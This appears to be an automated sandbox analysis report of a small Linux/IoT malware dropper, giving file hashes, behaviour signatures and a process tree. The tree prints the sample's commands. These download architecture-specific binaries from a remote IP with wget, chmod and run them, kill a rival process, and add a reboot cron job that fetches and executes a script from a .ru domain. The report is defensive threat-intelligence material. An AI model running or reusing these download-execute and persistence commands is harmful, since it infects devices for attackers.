Analysis
-
max time kernel
105s -
max time network
144s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
-
submitted
29-12-2024 02:31
General
-
Target
8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
-
Size
610B
-
MD5
92d13edccd8d4b5832ee62c441c24785
-
SHA1
dbb27ddb5dca8aead2e72e887c24cfce68947a22
-
SHA256
8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f
-
SHA512
d3f9223e692eff6ec1e5067555f05bf676489959fddddf3f890afa8006ae0c27500d61fabfcff3d14d1f03acd0f573b1cd61a1ee78ce16e9da4b075a03cd606a
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 8 IoCs
-
Renames itself 1 IoCs
-
Unexpected DNS network traffic destination 5 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown/tmp/8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown1⤵
- Writes file to shm directory
- Writes file to tmp directory
-
/usr/bin/killallkillall -9 dvrLocker2⤵
- Reads runtime system information
-
-
/bin/catcat /proc/mounts2⤵
- Reads runtime system information
-
-
/usr/bin/cutcut -d " " -f 22⤵
-
-
/bin/grepgrep -v noexe2⤵
-
-
/bin/grepgrep rw2⤵
-
-
/bin/grepgrep tmpfs2⤵
-
-
/bin/rmrm -rf .a .f2⤵
-
-
/bin/rmrm -rf .a .f2⤵
-
-
/bin/rmrm -rf .a .f2⤵
-
-
/bin/cpcp /proc/self/exe .f2⤵
- Reads runtime system information
-
-
/bin/chmodchmod 777 .f2⤵
- File and Directory Permissions Modification
-
-
/bin/rmrm -rf upnp2⤵
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.arm2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm5 -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.arm52⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mips -O -2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mpsl -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.mpsl2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
-
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
-
/usr/bin/crontabcrontab -l4⤵
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
-
-
-
-
/usr/bin/wgetwget http://103.188.82.218/t/ppc -O -2⤵
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.ppc2⤵
- Executes dropped EXE
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
-
-
/run/user/0/upnp./upnp tplink.x862⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
147KB
MD5cb925874303b1803b2c3dc486d3f8328
SHA1017d9efd6b451245076d3e27fdd1b3f5f49d8865
SHA2560857b37e550e8342a347eec0b3501a1aa5d315b2caf7ba027e672092d3593fee
SHA512e3e731934a643e03459a1d1c6d92810c66368404994f4e0f46165d0f901a70edcaec1dc0d0cb8c48ab146979231e26a99ec28e692bc751234473ebbb6555ee90
-
Filesize
73KB
MD5f812a7b3a877f717eb6e54b843b41848
SHA121ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA2569a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732
-
Filesize
85KB
MD5d8b9115310ca0429f6ec2473696156a2
SHA15497d765ad0b6ad6ed2204338faecd9671f6a60c
SHA2567f089801a37f1d9a83a5103c8f9b1c6fc00f9ce699cb812cc23704aea8d46c8c
SHA512a3adc2f2a36bdf40bda9e592f03bf51c3a3e7954fbeb8e52d1517537c72efc7df2d22e8be0d1ac85b768aacb45bd77cabb0ced0885ac96c17252b8af63cdb664
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
100KB
MD5de6ef4e554d7fc17efc20fabafe82de8
SHA1eca13ec698bed4ccde75e459d9267e68cbf874e9
SHA2569fe5e0525979f5bbff9354895b7299f0ee4a2bad41877636a71fcafaae283ec0
SHA5122e05e623b1ed416af7dfd115daef34ad5c1a4d334a267a84900998f2c58c577e0cca3b55c5f2acc7074b6f3f957a8999d70864875d5d0534d0c28f33c97f847e
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
306B
MD52d4c440d7bcf39114f32f807db51b06b
SHA12706c82bdb7a64ee541b38ce405724c0cba7ba06
SHA256fe7de5b4a470d5b9075d9bcddfef70890c7dadda8957b03cfd040aa5f4f2cecb
SHA512e20293ae4cc174a19ee5aedf873182bb274c28db62871b6825c565c9cac68e833f8b6b872b7215ad632ae0445bb8e095b3177960f0316fc660768f1f48ec3af8